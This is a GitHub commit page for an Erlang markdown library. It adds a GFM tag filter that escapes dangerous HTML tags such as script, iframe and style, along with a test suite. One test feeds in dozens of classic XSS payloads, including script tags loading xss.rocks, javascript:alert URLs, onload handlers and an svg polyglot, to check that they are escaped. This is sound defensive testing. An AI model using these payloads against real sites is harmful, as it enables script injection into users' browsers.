Skip to content

Commit f261af8

Browse files
committed
Add gfm_tagfilter test suite (1 case still failing).
1 parent faa0a67 commit f261af8

File tree

5 files changed

+456
-3
lines changed

5 files changed

+456
-3
lines changed

apps/markdown/include/markdown_const.hrl

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -2500,6 +2500,31 @@
25002500
%% [frontmatter]: crate::construct::frontmatter
25012501
-define(FRONTMATTER_SEQUENCE_SIZE, 3).
25022502

2503+
%% List of HTML tag names that are escaped by GFM's tag filter.
2504+
%%
2505+
%% Tag name matching must be performed insensitive to case, and thus this list
2506+
%% includes lowercase tag names.
2507+
%%
2508+
%% ## References
2509+
%%
2510+
%% * [*§ 6.11 Disallowed Raw HTML (extension)* in GFM](https://github.github.com/gfm/#disallowed-raw-html-extension-)
2511+
-define(GFM_HTML_TAGFILTER_NAMES, #{
2512+
<<"iframe">> => [],
2513+
<<"noembed">> => [],
2514+
<<"noframes">> => [],
2515+
<<"plaintext">> => [],
2516+
<<"script">> => [],
2517+
<<"style">> => [],
2518+
<<"textarea">> => [],
2519+
<<"title">> => [],
2520+
<<"xmp">> => []
2521+
}).
2522+
2523+
%% The length (in bytes) of the longest tag name in [`GFM_HTML_TAGFILTER_NAMES`][].
2524+
%%
2525+
%% This is currently the size of `plaintext`.
2526+
-define(GFM_HTML_TAGFILTER_SIZE_MAX, 9).
2527+
25032528
%% The number of preceding spaces needed for a [hard break
25042529
%% (trailing)][whitespace] to form.
25052530
%%

apps/markdown/include/markdown_util.hrl

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,10 @@
2626
-define('unreachable!'(Fmt, Args), erlang:error(unreachable, [?'format!'(Fmt, Args)])).
2727
-define('vec!'(List), markdown_vec:from_list(List)).
2828

29+
%% Guard-safe test: true when `X` is an ASCII letter (`A`-`Z` or `a`-`z`).
%% `X` is expanded several times, so pass a bound variable or a literal.
-define(is_ascii_alphabetic(X),
    (
        (((X) >= $A) andalso ((X) =< $Z)) orelse
            (((X) >= $a) andalso ((X) =< $z))
    )
).
2933
-define(is_ascii_alphanumeric(X),
3034
(((X) >= $0) andalso ((X) =< $9) orelse
3135
((X) >= $A) andalso ((X) =< $Z) orelse

apps/markdown/src/util/markdown_util_gfm_tagfilter.erl

Lines changed: 91 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -17,6 +17,7 @@ Make dangerous HTML a tiny bit safer.
1717
-compile(warn_missing_spec_all).
1818
-oncall("whatsapp_clr").
1919

20+
-include_lib("markdown/include/markdown_const.hrl").
2021
-include_lib("markdown/include/markdown_parser.hrl").
2122
-include_lib("markdown/include/markdown_util.hrl").
2223
-include_lib("markdown/include/markdown_vec.hrl").
@@ -54,6 +55,93 @@ assert_eq!(gfm_tagfilter("<iframe>"), "&lt;iframe>");
5455
""".
5556
-spec gfm_tagfilter(Value) -> GfmTagfilteredValue when Value :: binary(), GfmTagfilteredValue :: binary().
gfm_tagfilter(Value) when is_binary(Value) ->
    %% Scan from byte 0 with an empty accumulator; the second `0` is the
    %% offset of the first byte that has not been copied to the output yet.
    Len = byte_size(Value),
    gfm_tagfilter_loop(Value, <<>>, 0, 0, Len).
59+
60+
%%%-----------------------------------------------------------------------------
61+
%%% Internal functions
62+
%%%-----------------------------------------------------------------------------
63+
64+
%% @private
%% Returns the offset just past the run of ASCII letters that begins at
%% `NameStart`. `NameEnd` is the current scan position (callers start it at
%% `NameStart`). Scanning stops at the first non-letter, at `Len`, or once
%% `?GFM_HTML_TAGFILTER_SIZE_MAX` bytes have been consumed.
-spec find_tag_name_end(Bytes, NameStart, NameEnd, Len) -> NameEnd when
    Bytes :: binary(), NameStart :: non_neg_integer(), NameEnd :: non_neg_integer(), Len :: non_neg_integer().
find_tag_name_end(Bytes, NameStart, NameEnd, Len) ->
    MayAdvance = NameEnd < Len andalso (NameEnd - NameStart) < ?GFM_HTML_TAGFILTER_SIZE_MAX,
    case MayAdvance of
        false ->
            NameEnd;
        true ->
            Byte = binary:at(Bytes, NameEnd),
            if
                ?is_ascii_alphabetic(Byte) ->
                    find_tag_name_end(Bytes, NameStart, NameEnd + 1, Len);
                true ->
                    NameEnd
            end
    end.
78+
79+
%% @private
%% Scans `Bytes` starting at `Index` and returns the input with the `<` of
%% every tag-filtered opening or closing tag replaced by `&lt;`.
%%
%% * `Result` accumulates the output produced so far.
%% * `Start` is the offset of the first input byte not yet copied to `Result`.
%% * `Len` is the byte size of `Bytes`, threaded through to avoid recomputing it.
-spec gfm_tagfilter_loop(Bytes, Result, Index, Start, Len) -> Result when
    Bytes :: binary(),
    Result :: binary(),
    Index :: non_neg_integer(),
    Start :: non_neg_integer(),
    Len :: non_neg_integer().
gfm_tagfilter_loop(Bytes, Result1, Index1, Start1, Len) when Index1 < Len ->
    %% Inspect the byte at the current index. Matching on the head of `Bytes`
    %% would only ever look at the first byte of the whole input.
    case binary:at(Bytes, Index1) of
        $< ->
            %% Optional `/`. Bounds-checked because `<` may be the last byte.
            NameStart =
                case Index1 + 1 < Len andalso binary:at(Bytes, Index1 + 1) =:= $/ of
                    true ->
                        Index1 + 2;
                    false ->
                        Index1 + 1
                end,
            %% Tag name.
            NameEnd = find_tag_name_end(Bytes, NameStart, NameStart, Len),
            {Result2, Start2} =
                case is_filtered_tag(Bytes, NameStart, NameEnd, Len) of
                    true ->
                        %% Flush the pending slice and emit the escaped `<`.
                        %% The rest of the tag is copied verbatim by a later flush.
                        Pending = binary:part(Bytes, Start1, Index1 - Start1),
                        {<<Result1/bytes, Pending/bytes, "&lt;"/utf8>>, Index1 + 1};
                    false ->
                        {Result1, Start1}
                end,
            %% There was no `<` before `NameEnd`, so move to that next.
            gfm_tagfilter_loop(Bytes, Result2, NameEnd, Start2, Len);
        _ ->
            gfm_tagfilter_loop(Bytes, Result1, Index1 + 1, Start1, Len)
    end;
gfm_tagfilter_loop(Bytes, Result, _Index, Start, Len) ->
    %% End of input: copy everything after the last escaped `<`
    %% (or the whole input when nothing was escaped).
    <<Result/bytes, (binary:part(Bytes, Start, Len - Start))/bytes>>.
119+
120+
%% @private
%% Decides whether the candidate tag name occupying bytes
%% `[NameStart, NameEnd)` of `Bytes` has to be escaped.
%%
%% The candidate qualifies only when it is properly terminated and known:
%% it either runs to the end of the input, or it is non-empty and followed by
%% HTML whitespace, `/`, or `>`; and its case-folded form is a key of
%% `?GFM_HTML_TAGFILTER_NAMES`.
-spec is_filtered_tag(Bytes, NameStart, NameEnd, Len) -> boolean() when
    Bytes :: binary(), NameStart :: non_neg_integer(), NameEnd :: non_neg_integer(), Len :: non_neg_integer().
is_filtered_tag(Bytes, NameStart, NameEnd, Len) when NameEnd =:= Len ->
    %% The name runs up to the end of the input.
    is_known_tag_name(Bytes, NameStart, NameEnd);
is_filtered_tag(_Bytes, NameStart, NameEnd, _Len) when NameEnd =:= NameStart ->
    %% Empty name in the middle of the input: not a tag.
    false;
is_filtered_tag(Bytes, NameStart, NameEnd, _Len) ->
    is_html_whitespace_or_delimiter(binary:at(Bytes, NameEnd)) andalso
        is_known_tag_name(Bytes, NameStart, NameEnd).

%% @private
%% Case-folds the name at `[NameStart, NameEnd)` and looks it up in the
%% tag filter set.
-spec is_known_tag_name(Bytes, NameStart, NameEnd) -> boolean() when
    Bytes :: binary(), NameStart :: non_neg_integer(), NameEnd :: non_neg_integer().
is_known_tag_name(Bytes, NameStart, NameEnd) ->
    RawName = binary:part(Bytes, NameStart, NameEnd - NameStart),
    FoldedName = markdown_types:unicode_binary(string:casefold(RawName)),
    %% Known name.
    maps:is_key(FoldedName, ?GFM_HTML_TAGFILTER_NAMES).
137+
138+
-doc """
Returns `true` for the characters that may terminate an HTML tag name:
HTML whitespace (tab, line feed, form feed, carriage return, space),
a closing slash (`/`), or a closing angle bracket (`>`).
""".
-spec is_html_whitespace_or_delimiter(char()) -> boolean().
is_html_whitespace_or_delimiter($\t) -> true;
is_html_whitespace_or_delimiter($\n) -> true;
is_html_whitespace_or_delimiter($\f) -> true;
is_html_whitespace_or_delimiter($\r) -> true;
is_html_whitespace_or_delimiter($\s) -> true;
is_html_whitespace_or_delimiter($/) -> true;
is_html_whitespace_or_delimiter($>) -> true;
is_html_whitespace_or_delimiter(_) -> false.
Lines changed: 191 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,191 @@
1+
%%% % DO NOT EDIT: this file was generated by 'just codegen'
2+
%%% % @generated SignedSource<<60159ac2f544d43788d7acc38b52a010>>
3+
%%% % @format
4+
%%%-----------------------------------------------------------------------------
5+
%%% Copyright (c) Meta Platforms, Inc. and affiliates.
6+
%%% Copyright (c) WhatsApp LLC
7+
%%%
8+
%%% This source code is licensed under the MIT license found in the
9+
%%% LICENSE.md file in the root directory of this source tree.
10+
%%%-----------------------------------------------------------------------------
11+
-module(markdown_gfm_tagfilter_SUITE).
12+
-moduledoc """
13+
14+
""".
15+
-moduledoc #{author => ["Andrew Bennett <[email protected]>"]}.
16+
-moduledoc #{created => "", modified => ""}.
17+
-moduledoc #{copyright => "Meta Platforms, Inc. and affiliates."}.
18+
-compile(warn_missing_spec_all).
19+
-oncall("whatsapp_clr").
20+
21+
-include_lib("markdown/include/markdown_mdast.hrl").
22+
-include_lib("markdown/include/markdown_util.hrl").
23+
-include_lib("stdlib/include/assert.hrl").
24+
25+
-behaviour(ct_suite).
26+
27+
%% ct_suite callbacks
28+
-export([
29+
all/0,
30+
groups/0,
31+
init_per_suite/1,
32+
end_per_suite/1,
33+
init_per_group/2,
34+
end_per_group/2
35+
]).
36+
37+
%% Test Cases
38+
-export([
39+
test_gfm_tagfilter_case_1/1,
40+
test_gfm_tagfilter_case_2/1,
41+
test_gfm_tagfilter_case_3/1,
42+
test_gfm_tagfilter_case_4/1,
43+
test_gfm_tagfilter_case_5/1,
44+
test_gfm_tagfilter_case_6/1
45+
]).
46+
47+
%%%=============================================================================
48+
%%% ct_suite callbacks
49+
%%%=============================================================================
50+
51+
-spec all() -> markdown_test:all().
52+
all() ->
53+
[
54+
{group, static}
55+
].
56+
57+
-spec groups() -> markdown_test:groups().
58+
groups() ->
59+
[
60+
{static, [parallel], [
61+
test_gfm_tagfilter_case_1,
62+
test_gfm_tagfilter_case_2,
63+
test_gfm_tagfilter_case_3,
64+
test_gfm_tagfilter_case_4,
65+
test_gfm_tagfilter_case_5,
66+
test_gfm_tagfilter_case_6
67+
]}
68+
].
69+
70+
-spec init_per_suite(Config :: ct_suite:ct_config()) -> markdown_test:init_per_suite().
71+
init_per_suite(Config) ->
72+
Config.
73+
74+
-spec end_per_suite(Config :: ct_suite:ct_config()) -> markdown_test:end_per_suite().
75+
end_per_suite(_Config) ->
76+
ok.
77+
78+
-spec init_per_group(GroupName :: ct_suite:ct_groupname(), Config :: ct_suite:ct_config()) ->
79+
markdown_test:init_per_group().
80+
init_per_group(_Group, Config) ->
81+
Config.
82+
83+
-spec end_per_group(GroupName :: ct_suite:ct_groupname(), Config :: ct_suite:ct_config()) ->
84+
markdown_test:end_per_group().
85+
end_per_group(_Group, _Config) ->
86+
ok.
87+
88+
%%%=============================================================================
89+
%%% Test Cases
90+
%%%=============================================================================
91+
92+
-spec test_gfm_tagfilter_case_1(Config) -> markdown_test:testcase() when
93+
Config :: ct_suite:ct_config().
94+
test_gfm_tagfilter_case_1(_Config) ->
95+
?assertMatch(
96+
{ok, <<"<iframe>"/utf8>>},
97+
markdown:to_html_with_options(
98+
<<"<iframe>"/utf8>>, markdown_options:default(#{compile => #{allow_dangerous_html => true}})
99+
),
100+
"should not filter by default"
101+
),
102+
ok.
103+
104+
-spec test_gfm_tagfilter_case_2(Config) -> markdown_test:testcase() when
105+
Config :: ct_suite:ct_config().
106+
test_gfm_tagfilter_case_2(_Config) ->
107+
?assertMatch(
108+
{ok, <<"<p>a &lt;i&gt;</p>\n&lt;script&gt;"/utf8>>},
109+
markdown:to_html_with_options(
110+
<<"a <i>\n<script>"/utf8>>, markdown_options:default(#{compile => #{gfm_tagfilter => true}})
111+
),
112+
"should not turn `allow_dangerous_html` on"
113+
),
114+
ok.
115+
116+
-spec test_gfm_tagfilter_case_3(Config) -> markdown_test:testcase() when
117+
Config :: ct_suite:ct_config().
118+
test_gfm_tagfilter_case_3(_Config) ->
119+
?assertMatch(
120+
{ok, <<"&lt;iframe>"/utf8>>},
121+
markdown:to_html_with_options(
122+
<<"<iframe>"/utf8>>,
123+
markdown_options:default(#{compile => #{allow_dangerous_html => true, gfm_tagfilter => true}})
124+
),
125+
"should filter"
126+
),
127+
ok.
128+
129+
-spec test_gfm_tagfilter_case_4(Config) -> markdown_test:testcase() when
130+
Config :: ct_suite:ct_config().
131+
test_gfm_tagfilter_case_4(_Config) ->
132+
?assertMatch(
133+
{ok, <<"&lt;iframe\n>"/utf8>>},
134+
markdown:to_html_with_options(
135+
<<"<iframe\n>"/utf8>>,
136+
markdown_options:default(#{compile => #{allow_dangerous_html => true, gfm_tagfilter => true}})
137+
),
138+
"should filter when followed by a line ending (1)"
139+
),
140+
ok.
141+
142+
-spec test_gfm_tagfilter_case_5(Config) -> markdown_test:testcase() when
143+
Config :: ct_suite:ct_config().
144+
test_gfm_tagfilter_case_5(_Config) ->
145+
?assertMatch(
146+
{ok, <<"<div\n>"/utf8>>},
147+
markdown:to_html_with_options(
148+
<<"<div\n>"/utf8>>,
149+
markdown_options:default(#{compile => #{allow_dangerous_html => true, gfm_tagfilter => true}})
150+
),
151+
"should filter when followed by a line ending (2)"
152+
),
153+
ok.
154+
155+
-spec test_gfm_tagfilter_case_6(Config) -> markdown_test:testcase() when
156+
Config :: ct_suite:ct_config().
157+
test_gfm_tagfilter_case_6(_Config) ->
158+
?assertMatch(
159+
{ok, <<"""
160+
&lt;title>
161+
<div title="&lt;title>"></div>
162+
<p><span title="&lt;title>"></span></p>
163+
<div>&lt;title>&lt;/title></div>
164+
<p><span>&lt;title>&lt;/title></span></p>
165+
<p><b>&lt;textarea>&lt;/textarea></b></p>
166+
<p>&lt;script/src=&quot;#&quot;&gt;</p>
167+
&lt;SCRIPT SRC=http://xss.rocks/xss.js>&lt;/SCRIPT>
168+
<IMG SRC="javascript:alert('XSS');">
169+
<p>&lt;IMG SRC=javascript:alert('XSS')&gt;</p>
170+
<p>&lt;IMG SRC=<code>javascript:alert(&quot;RSnake says, 'XSS'&quot;)</code>&gt;</p>
171+
<p>&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT>alert(&quot;XSS&quot;)&lt;/SCRIPT>&quot;&gt;</p>
172+
<p>&lt;SCRIPT/XSS SRC=&quot;http://xss.rocks/xss.js&quot;&gt;&lt;/SCRIPT></p>
173+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
174+
<p>&lt;&lt;SCRIPT>alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT></p>
175+
&lt;SCRIPT SRC=http://xss.rocks/xss.js?< B >
176+
177+
&lt;SCRIPT SRC=//xss.rocks/.j>
178+
179+
&lt;/TITLE>&lt;SCRIPT>alert("XSS");&lt;/SCRIPT>
180+
&lt;STYLE>li {list-style-image: url("javascript:alert('XSS')");}&lt;/STYLE><UL><LI>XSS</br>
181+
<p>javascript:/<em>--&gt;&lt;/title>&lt;/style>&lt;/textarea>&lt;/script>&lt;/xmp>&lt;svg/onload='+/&quot;/+/onmouseover=1/+/[</em>/[]/+alert(1)//'&gt;</p>
182+
&lt;STYLE>@import'http://xss.rocks/xss.css';&lt;/STYLE>
183+
184+
"""/utf8>>},
185+
markdown:to_html_with_options(
186+
<<"\n<title>\n\n<div title=\"<title>\"></div>\n\n<span title=\"<title>\"></span>\n\n<div><title></title></div>\n\n<span><title></title></span>\n\n<b><textarea></textarea></b>\n\n<script/src=\"#\">\n\n<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\n\n<IMG SRC=\"javascript:alert('XSS');\">\n\n<IMG SRC=javascript:alert('XSS')>\n\n<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\n\n<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"\\>\n\n<SCRIPT/XSS SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n\n<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n\n<<SCRIPT>alert(\"XSS\");//\\<</SCRIPT>\n\n<SCRIPT SRC=http://xss.rocks/xss.js?< B >\n\n<SCRIPT SRC=//xss.rocks/.j>\n\n</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\n\n<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>\n\njavascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>\n\n<STYLE>@import'http://xss.rocks/xss.css';</STYLE>\n"/utf8>>,
187+
markdown_options:default(#{compile => #{allow_dangerous_html => true, gfm_tagfilter => true}})
188+
),
189+
"should handle things like GitHub"
190+
),
191+
ok.

0 commit comments

Comments
 (0)